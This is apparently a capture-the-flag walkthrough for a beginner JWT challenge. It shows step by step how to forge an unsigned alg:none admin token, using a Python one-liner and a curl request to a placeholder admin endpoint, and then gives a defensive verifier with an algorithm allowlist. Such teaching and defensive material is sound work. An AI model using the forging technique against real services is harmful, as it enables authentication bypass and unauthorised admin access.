HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

TokenForge — Algorithm None

JWT Attacks · JWT Algorithm None
Difficulty: Beginner
Vuln class: JWT Algorithm None
Steps: 3
// Objective
Forge a JWT with alg:none and an admin payload to bypass authentication.
// Tools required
Browser, Burp Suite, jwt_tool, base64
// Step-by-step walkthrough
1. Capture a valid JWT
Log in as a regular user and capture the JWT from the Authorization header or cookie. Decode the payload section (base64url decode the middle part).
Command / Input
base64 -d <<< eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoidXNlciJ9
Output
{"user":"guest","role":"user"}
2. Forge an admin token with alg:none
Build a new JWT from the header {"alg":"none","typ":"JWT"}, an admin payload, and an empty signature: base64url-encode the header and the payload without padding, join them with a dot, and append a trailing dot for the empty signature.
Command / Input
python3 -c "
import base64, json
# compact separators so the encoded segments match the output shown below
h = base64.urlsafe_b64encode(json.dumps({'alg':'none','typ':'JWT'}, separators=(',', ':')).encode()).rstrip(b'=').decode()
p = base64.urlsafe_b64encode(json.dumps({'user':'admin','role':'admin'}, separators=(',', ':')).encode()).rstrip(b'=').decode()
print(f'{h}.{p}.')"
Output
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
3. Access the admin endpoint
Send the forged token to the protected admin route.
Command / Input
curl http://TARGET/api/admin -H "Authorization: Bearer FORGED_TOKEN"
Output
{"flag":"HackrGG{jwt_n0n3_4lg_byp4ss}"}
// Flag
Flag value
HackrGG{jwt_n0n3_4lg_byp4ss}
Returned by /api/admin when the forged alg:none token is accepted.
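The server-side fix, added here as an example rather than code from the challenge: a verifier that pins an algorithm allowlist so the token's own alg header can pass or fail the check but never select "none", then verifies the HMAC. DEMO_KEY, mint_hs256 and check_token are assumptions for the example; FORGED_TOKEN is the token produced in step 2.

```python
import base64, hashlib, hmac, json

ALLOWED_ALGS = {"HS256"}  # server-side allowlist; "none" is never a member

def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(part: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def verify_jwt(token: str, key: bytes) -> dict:
    """Return the payload of a valid HS256 token, else raise ValueError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    alg = header.get("alg")
    # The token's "alg" only gets to pass or fail the allowlist; it never chooses the check.
    # This rejects the walkthrough's alg:none token before any signature logic runs.
    if alg not in ALLOWED_ALGS:
        raise ValueError(f"algorithm not allowed: {alg!r}")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))

def check_token(token: str, key: bytes):
    """Wrapper for callers and tests: (True, payload) if accepted, (False, reason) if rejected."""
    try:
        return True, verify_jwt(token, key)
    except ValueError as exc:
        return False, str(exc)

def mint_hs256(payload: dict, key: bytes) -> str:
    """Issue a properly signed HS256 token, as the legitimate issuer would."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"

DEMO_KEY = b"constructed-demo-key"  # constructed for the example; real keys are long, random and secret
# The forged alg:none token from step 2 of the walkthrough (empty signature after the last dot)
FORGED_TOKEN = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ."

if __name__ == "__main__":
    print(check_token(FORGED_TOKEN, DEMO_KEY))  # (False, "algorithm not allowed: 'none'")
    print(check_token(mint_hs256({"user": "guest", "role": "user"}, DEMO_KEY), DEMO_KEY))
```

The same allowlist idea applies to library verifiers: pass the expected algorithm explicitly on every verify call and treat a token whose alg is anything else, including any spelling of none, as invalid.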